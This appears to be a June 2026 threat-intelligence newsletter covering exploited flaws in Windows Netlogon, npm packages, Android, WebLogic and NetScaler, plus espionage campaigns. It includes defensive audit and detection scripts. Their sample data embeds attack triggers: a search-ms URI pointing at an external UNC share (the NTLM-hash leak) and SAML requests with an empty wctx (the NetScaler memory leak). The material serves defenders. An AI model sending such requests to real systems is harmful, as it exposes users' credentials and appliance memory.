Thursday, June 4, 2026 - Border Cyber Group


Windows Netlogon RCE (CVE-2026-41089, CVSS 9.8)

Sources: Belgium Centre for Cybersecurity (CCB) advisory; BleepingComputer; Orca Security; RedPacket Security

A stack-based buffer overflow in the Windows Netlogon service is confirmed under active exploitation. An unauthenticated attacker with network access to a domain controller can send a crafted Netlogon RPC request and achieve SYSTEM-level code execution. All currently supported Windows Server releases — Server 2012 through Server 2025 — are affected. Microsoft patched the flaw during May Patch Tuesday on May 12, as part of a release addressing more than 130 vulnerabilities. Microsoft's initial advisory rated it as "less likely" to be exploited; the Belgian CCB updated its advisory on May 29 with active-exploitation confirmation sourced from "trusted partners." Microsoft has not independently corroborated those claims, but recommends applying the patch immediately.

A public proof-of-concept has been published. As of this writing it is crash-oriented — it demonstrates the buffer overflow condition by sending a malformed CLDAP request and verifying whether the DC stops responding — but does not include shellcode or command execution. Even so, a public crash primitive narrows the gap to a working exploit, and threat actors can and do extend published PoC code.

Why it matters: The history of Netlogon vulnerabilities — including ZeroLogon (CVE-2020-1472) — demonstrates that domain-controller flaws frequently attract rapid exploit development and ransomware operator interest once technical details are public. The blast radius of a successful exploit is an entire Active Directory domain.

Defender action: Apply the May 2026 cumulative update to all domain controllers immediately, and do so across the entire environment in a single window — partial patching leaves remaining DCs exposed. Restrict Netlogon traffic to authenticated internal sources; isolate domain controllers from internet exposure. Do not wait for the June 9 Patch Tuesday window.

CCB advisory / BleepingComputer / Orca Security blog


Miasma Worm Backdoors 32 Red Hat npm Packages

Sources: Wiz Research (primary); Aikido Security; OX Security — all June 1, 2026

On June 1, a credential-stealing worm was injected into 96 versions across 32 packages under the @redhat-cloud-services npm namespace — packages with a combined download volume of roughly 117,000 per week. The entry point was a compromised Red Hat employee GitHub account: threat intelligence firm Whiteintel found the relevant credential and session cookie in infostealer logs dated April 13 and May 15. The attacker leveraged GitHub Actions OIDC tokens, meaning the CI/CD pipeline itself was the delivery mechanism rather than an individually stolen npm token. The malicious preinstall script runs automatically on npm install and harvests GitHub tokens, npm tokens, AWS/GCP/Azure credentials, SSH keys, and local environment variables, exfiltrating them to an attacker-controlled GitHub repository over encrypted channels.

Attribution: The payload is a variant of Mini Shai-Hulud, a credential-stealing worm whose source code was publicly released by threat actor TeamPCP (also tracked as Replicating Marauder / UNC6780) on May 12, 2026, and has since become available to other actors. Because the tooling is now open-source, direct attribution to TeamPCP is assessed at medium confidence only. As of June 4, Wiz Research has confirmed a second wave of affected packages — same core payload, now using binding.gyp for installation-time execution.

Defender action: Audit CI/CD pipelines for unexpected workflow modifications over the past two weeks. Rotate any credentials present in environments that installed affected versions. The full impacted package list is in the Wiz Research primary advisory.
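
An added example (not Wiz's, Red Hat's, or the newsletter's own code) of the audit step above: it walks a package-lock.json for @redhat-cloud-services packages and flags the install-time hooks the payload relied on, a preinstall script in the first wave and binding.gyp in the second. The lockfile, manifests and package names are constructed; the affected-version list has to come from the Wiz Research advisory.

```python
"""Audit an npm v2/v3 package-lock.json for @redhat-cloud-services packages and
for the install-time hooks the Miasma payload used (a preinstall script in the
first wave, binding.gyp in the second). All inputs below are constructed; the
affected-version list must be taken from Wiz Research's advisory."""
import json

NAMESPACE = "@redhat-cloud-services/"
HOOKS = ("preinstall", "install", "postinstall")  # run automatically by npm install


def audit(lock: dict, manifests: dict, affected: dict) -> list:
    """lock: parsed package-lock.json; manifests: package name -> that package's
    installed package.json (read from node_modules in practice); affected:
    name -> set of compromised versions. Returns one finding per flagged package."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        if not name.startswith(NAMESPACE):
            continue
        version = meta.get("version", "")
        reasons = []
        if version in affected.get(name, set()):
            reasons.append("version listed as compromised")
        if meta.get("hasInstallScript"):  # npm 7+ records lifecycle hooks here
            reasons.append("lockfile marks an install-time script")
        scripts = manifests.get(name, {}).get("scripts", {})
        for hook in HOOKS:
            if hook in scripts:
                reasons.append(f"{hook} script: {scripts[hook]!r}")
        if manifests.get(name, {}).get("gypfile"):  # npm sets this when binding.gyp ships
            reasons.append("binding.gyp present: node-gyp runs at install time")
        if reasons:
            findings.append({"name": name, "version": version, "reasons": reasons})
    return findings


# Constructed sample: one clean package, one carrying a preinstall hook.
SAMPLE_LOCK = json.loads("""{"lockfileVersion": 3, "packages": {
  "node_modules/@redhat-cloud-services/example-a": {"version": "2.0.1"},
  "node_modules/@redhat-cloud-services/example-b": {"version": "1.4.0",
                                                    "hasInstallScript": true},
  "node_modules/lodash": {"version": "4.17.21"}}}""")
SAMPLE_MANIFESTS = {
    "@redhat-cloud-services/example-b": {"scripts": {"preinstall": "node setup.js"}},
}

if __name__ == "__main__":
    for f in audit(SAMPLE_LOCK, SAMPLE_MANIFESTS, affected={}):
        print(f["name"], f["version"], "; ".join(f["reasons"]))
```

Any hit against the advisory's version list means the build environment's tokens and cloud credentials should be treated as exposed and rotated.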

Wiz Research primary / Aikido Security / OX Security


Windows Search URI Handler Leaks NTLMv2 Hashes — No CVE Assigned

Source: Huntress (Andrew Schwartz) — disclosed June 3, 2026

Huntress disclosed an unpatched variant of the same NTLM credential-leakage primitive that Microsoft fixed in April for the Windows Snipping Tool (CVE-2026-33829). The search: URI handler accepts a crumb=location: parameter that, when pointed at a UNC path, triggers outbound SMB authentication before Windows renders any error — leaking the user's Net-NTLMv2 hash to an attacker-controlled server with a single link click. No malware, no payload, no complex exploit chain required.

The policy problem: Microsoft confirmed the same Moderate / CVSS 4.3 rating as the Snipping Tool bug but declined to patch or assign a CVE, stating the issue falls below its servicing bar. The search-ms: / crumb=location: UNC leakage primitive was documented by Varonis in February 2024 and closed without a patch then too. This class of vulnerability has a consistent track record of Microsoft declining to service it, and organizations relying on CVE coverage as their patch signal have zero visibility into it.

Defender action: Block outbound SMB (TCP 445 and 139) from endpoints that do not require it. Enforce SMB signing. Where feasible, set RestrictSendingNTLMTraffic to 2 after internal auditing. Alert on search: URI handler invocations from browser processes.
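
The last item above, the alert on search: URI invocations, as an added detection example (not Huntress's code): it flags process-creation events in which a browser launched a search: or search-ms: URI whose crumb=location: names a UNC path. The events, the browser list and the Sysmon-style field names (ParentImage, Image, CommandLine) are assumptions about the telemetry export, not anything from the research.

```python
"""Flag process-creation events where a browser launched a search:/search-ms:
URI whose crumb=location: points at a UNC path (the NTLM-leak trigger above).
Events are constructed in a Sysmon Event ID 1 style; field names are assumed."""
import re
from urllib.parse import unquote

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
URI_RE = re.compile(r"(?i)\b(search(?:-ms)?):(\S*)")  # both schemes take crumb=
UNC_RE = re.compile(r"^\\\\[^\\]+\\")                 # \\host\share...


def unc_location(command_line: str):
    """Return the UNC path passed to crumb=location:, or None if absent/local."""
    m = URI_RE.search(command_line)
    if not m:
        return None
    for part in unquote(m.group(2)).split("&"):  # unquote handles %5C-encoded paths
        key, _, value = part.partition("=")
        if key.lower() == "crumb" and value.lower().startswith("location:"):
            loc = value[len("location:"):].strip('"')
            if UNC_RE.match(loc):
                return loc
    return None


def flag_event(event: dict):
    """Alert only when the parent is a browser: a one-click link is the vector."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    loc = unc_location(event.get("CommandLine", ""))
    if loc and parent in BROWSERS:
        return {"parent": parent, "image": event.get("Image", ""),
                "unc_host": loc.split("\\")[2]}  # host that would receive the NTLM auth
    return None


def scan(events):
    return [a for a in (flag_event(e) for e in events) if a]


# Constructed sample events (documentation-range IP, not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" search-ms:displayname=Docs&crumb=location:\\203.0.113.5\share'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" search-ms:crumb=location:C:\Users\alice\Documents'},
    {"ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" https://example.com/'},
]
```

Pair the alert with the egress block: a hit whose unc_host is external confirms both that the link was clicked and whether the SMB block held.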

Huntress primary research


Android Framework Zero-Day (CVE-2025-48595) Under Limited Targeted Exploitation

Sources: Google Android Security Bulletin June 2026; CISA KEV entry June 2, 2026; BleepingComputer

Google's June 2026 Android security update addresses 124 vulnerabilities, including one confirmed zero-day: CVE-2025-48595, an integer overflow in multiple locations within the Android Framework that enables local privilege escalation without any user interaction. Affected versions: Android 14, 15, 16, and 16 QPR2. Google's phrasing — "limited, targeted exploitation" — is the same language the company typically uses for commercial spyware or nation-state operations against specific high-value individuals, though no actor has been publicly attributed.

Technical note: The attack vector is local, meaning likely delivery paths include a malicious or trojanized application, or chaining with a separate initial-access vulnerability. CISA added CVE-2025-48595 to the KEV catalog on June 2 with a June 5 remediation deadline for federal agencies. This is the fourth Android zero-day confirmed as exploited since December 2025.

Defender action: Enterprise Android fleets managed via MDM/EMM should force the June patch cycle. Pixel devices receive updates immediately; OEM timelines vary.

Google Android Security Bulletin / BleepingComputer


Oracle WebLogic CVE-2024-21182: A 2024-Era Bug Still Getting Popped

Sources: CISA KEV entry June 1, 2026; The Hacker News; thecybersignal.com

CISA added CVE-2024-21182 to the Known Exploited Vulnerabilities catalog on June 1, with a June 4 federal remediation deadline — today. The vulnerability is in Oracle WebLogic's Core component and allows unauthenticated network-level access via the T3 and IIOP protocols, the same protocol surface behind multiple previous critical WebLogic exploitations. Oracle patched it in the July 2024 Critical Patch Update. Active exploitation confirmed nearly two years after that patch indicates a persistent population of unpatched, internet-exposed WebLogic deployments.

Caution on classification: Despite RCE framing in some coverage, CISA's official description characterizes the impact as unauthorized access to WebLogic-accessible data, not confirmed remote code execution. CVSS is 7.5. No threat actor has been publicly attributed to current exploitation.

Defender action: Apply the Oracle July 2024 CPU or any subsequent CPU that includes the fix. If WebLogic's T3 and IIOP protocols are internet-accessible, restrict them to internal network segments immediately.

CISA KEV catalog / The Hacker News


Gamaredon Chains WinRAR CVE Into a Full Modular Malware Suite Against Ukraine

Sources: Sekoia threat research (primary, January 2026 infection chain); Google Threat Intelligence Group (CVE multi-actor attribution, January 2026)

Sekoia published analysis of a Gamaredon campaign against Ukrainian organizations using CVE-2025-8088, a path traversal flaw in WinRAR versions prior to 7.13. The same CVE has been tied by Google Threat Intelligence Group to independent exploitation by Sandworm (APT44/FROZENBARENTS), Turla (SUMMIT), and a China-nexus actor — each deploying different payloads against largely overlapping Ukrainian targets. The multi-actor adoption of a single exploit is worth flagging: GTIG documented all four clusters using the same vulnerability in separate campaigns observed through January 2026.

The Gamaredon-specific infection chain: weaponized xHTML lure → CVE-2025-8088 exploits WinRAR to write a hidden HTA into the Windows Startup directory → GammaPhish (mshta.exe execution with a decoy PDF) → GammaLoad (VBScript fingerprinting and downloader) → GammaWorm and/or GammaSteel depending on operator objective.

Technical highlights:

  • GammaWorm — Sekoia describes this as a VBScript worm of more than 20,000 lines of obfuscated code. It abuses NTFS Alternate Data Streams to hide its modules from casual filesystem inspection and resolves C2 infrastructure through Telegram, Telegra.ph, Teletype.in, and Cloudflare Workers as dead-drop resolvers, storing live server addresses in registry keys under HKCU\Console\.
  • GammaSteel — A modular information stealer that exfiltrates files matching targeted extensions to an AWS S3 bucket, with an attacker-controlled server as fallback. The campaign has shifted largely to fileless VBScript execution — a deliberate stealth improvement over earlier Gamaredon tooling.

Defender action: Update WinRAR to 7.13 or later. Monitor the Windows Startup folder for new HTA, LNK, or script files created via RAR extraction. Alert on mshta.exe network connections and outbound Netlogon/SMB from non-DC workstations.

Sekoia blog (primary) / Google Threat Intelligence Group

Note: Pull Sekoia's full technical write-up for the complete IOC set before publishing. The GTIG CVE-2025-8088 multi-actor report is publicly available on Google Cloud Blog.


DriveSurge: Industrialized ClickFix and FakeUpdates IAB Operation

Sources: SilentPush research report (primary); BleepingComputer — June 1–2, 2026

SilentPush documented DriveSurge, an initial access broker that has operated since at least September 2025 and evaded detection for nearly a year. Its model: compromise legitimate high-reputation websites, inject lightweight JavaScript beacon scripts, then route qualified visitors through an open-source traffic distribution system (zTDS) to either ClickFix or FakeUpdates lure pages. The TDS actively profiles visitors — bots and researchers receive the clean legitimate page; profiled targets get the social engineering overlay.

The ClickFix variant delivers a fake error message paired with a PowerShell command that installs malware directly. FakeUpdates impersonates browser update prompts for Chrome, Firefox, Edge, Safari, and eight other browsers. DriveSurge operates as a pay-per-install intermediary, selling verified initial access to downstream operators — making it a precursor supplier for ransomware and espionage campaigns. Infrastructure was traced through NiceNIC-registered bulletproof hosting domains. Both Windows and macOS systems are targeted; macOS ClickFix attacks use clipboard hijacking.

SilentPush primary report / BleepingComputer


Citrix NetScaler CVE-2026-3055: Large-Scale Exploitation Confirmed

Sources: Rapid7 ETR (primary technical analysis); watchTowr; Fortinet threat intelligence; Cybersecurity Dive — March–June 2026

CVE-2026-3055 is a SAML IDP-specific out-of-bounds memory read in NetScaler ADC and Gateway (CVSS 9.3, patched March 23). Fortinet's threat intelligence team has confirmed large-scale exploitation in the wild against internet-facing NetScaler appliances configured as SAML Identity Providers. watchTowr's technical analysis identified that the flaw involves an unvalidated wctx parameter in SAML-related HTTP requests; when the parameter is present without an associated value, the appliance reads uninitialized memory and leaks it in the response. CISA added the CVE to its KEV catalog in late March.

This item is carried forward because Fortinet's large-scale confirmation is recent and many organizations remain unpatched. The exploitation pattern follows a trajectory reminiscent of the earlier CitrixBleed cycle — reconnaissance, targeted exploitation, and rapid broadening once reliable techniques circulated.

Defender action: Apply the March 23 patch (NetScaler ADC/Gateway 14.1-66.59 or later; 13.1-62.23 or later). Check whether appliances are configured as SAML Identity Providers and prioritize those. If patching is not immediately possible, restrict external access to SAML IDP endpoints at the network layer.
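
An added example (not Rapid7's, watchTowr's or Citrix's code) of hunting for the trigger described above in appliance or reverse-proxy access logs: it flags requests to SAML IDP paths that carry wctx with no value. The log lines are constructed in Apache combined format, and the SAML_PATHS prefixes are an assumption about where an IDP listens, not a list from Citrix.

```python
"""Detect requests matching the CVE-2026-3055 trigger: a SAML IDP request that
carries wctx without an associated value. Log lines are constructed in Apache
combined format; SAML_PATHS is an assumed endpoint list, not Citrix's."""
import re
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
SAML_PATHS = ("/saml/", "/cgi/samlauth")  # assumed IDP endpoint prefixes


def has_empty_wctx(target: str) -> bool:
    """True when the query carries wctx with no value ('?wctx' or '?wctx=')."""
    query = urlsplit(target).query
    # keep_blank_values=True is required: otherwise a bare '?wctx' is dropped.
    return any(k == "wctx" and v == ""
               for k, v in parse_qsl(query, keep_blank_values=True))


def scan(lines, prefixes=SAML_PATHS):
    """Return (client_ip, target, status) for each suspicious request. Only the
    URL is visible in an access log; a wctx sent in a POST body needs a full
    request capture to inspect, so treat a clean result as partial coverage."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-HTTP line
        target = m["target"]
        if urlsplit(target).path.startswith(prefixes) and has_empty_wctx(target):
            hits.append((m["ip"], target, int(m["status"])))
    return hits


# Constructed sample lines (documentation-range IPs, not real traffic). Note the
# larger response sizes on the first two: leaked memory inflates the reply.
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Jun/2026:10:01:02 +0000] "GET /saml/login?wctx HTTP/1.1" 200 5123',
    '198.51.100.7 - - [04/Jun/2026:10:01:03 +0000] "GET /saml/login?wctx= HTTP/1.1" 200 4980',
    '203.0.113.9 - - [04/Jun/2026:10:02:00 +0000] "GET /saml/login?wctx=rm%3D0 HTTP/1.1" 200 812',
    '192.0.2.4 - - [04/Jun/2026:10:03:00 +0000] "GET /index.html?wctx HTTP/1.1" 404 0',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, target, status in scan(SAMPLE_LOG):
        print(f"empty wctx from {ip}: {target} -> {status}")
```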

Rapid7 ETR / watchTowr technical analysis / Cybersecurity Dive


MuddyWater Uses Microsoft Teams Screen-Sharing for Credential Harvesting

Source: Rapid7 incident response report — intrusion observed early 2026

Rapid7 documented an intrusion attributed with high confidence to MuddyWater — an Iranian state-sponsored cluster linked to MOIS — that initially appeared to be a Chaos ransomware incident. Rapid7's assessment is that the operational objectives were espionage and credential access, not disruption; no file-encrypting payload was deployed. The ransomware framing appears to be a deliberate attribution-confusion technique.

Initial access was social engineering via Microsoft Teams: the threat actors engaged victim employees directly, established screen-sharing sessions, and used live access to steal credentials, manipulate MFA configurations, and compromise accounts. In at least one instance, AnyDesk was deployed for persistent remote management access. The attackers accessed VPN configuration files directly and instructed employees to type credentials into locally created text files during the session.

Pattern to flag: Teams-based social engineering has appeared repeatedly across MuddyWater and related Iranian clusters through 2024–2026. The TTPs here — screen-sharing, MFA manipulation, AnyDesk deployment — require no exploits and leave limited forensic artifacts compared to malware-based intrusions.

Rapid7 incident response report

Follow-up: Pull Rapid7's full write-up for complete MITRE ATT&CK mapping and IOCs. #followup


Active exploitation dashboard — June 4, 2026

CVE | Product | CVSS | KEV status | Action
CVE-2026-41089 | Windows Netlogon (domain controllers, all supported Server releases) | 9.8 | Not yet listed | Patch immediately
CVE-2025-48595 | Android Framework (Android 14, 15, 16, 16 QPR2) | 8.4 | Added June 2 — due June 5 | Force MDM update
CVE-2024-21182 | Oracle WebLogic (T3 / IIOP protocol surface) | 7.5 | Added June 1 — due today | Apply Oracle July 2024 CPU
CVE-2026-3055 | Citrix NetScaler (SAML IDP configurations only) | 9.3 | Added March 2026 | Patch NetScaler 13.1 / 14.1
No CVE assigned | Windows search: URI handler (NTLM hash leakage, one-click) | ~4.3 | No patch — declined by Microsoft | Block outbound SMB; enforce signing

Sources checked: CISA KEV catalog, BleepingComputer, The Hacker News, CCB Belgium, Huntress, Wiz Research, Aikido Security, SilentPush, Sekoia, Google Threat Intelligence Group, SecurityWeek, Rapid7, SC Media, Orca Security, watchTowr, RedPacket Security. All items corroborated across at least two independent sources except where noted as single-source.


Jonathan Brown is a cybersecurity researcher and investigative journalist at bordercybergroup.com.

If you would like to support our work — useful, well-researched, ad-free cybersecurity intelligence — buy us a coffee: https://bordercybergroup.com/#/portal/support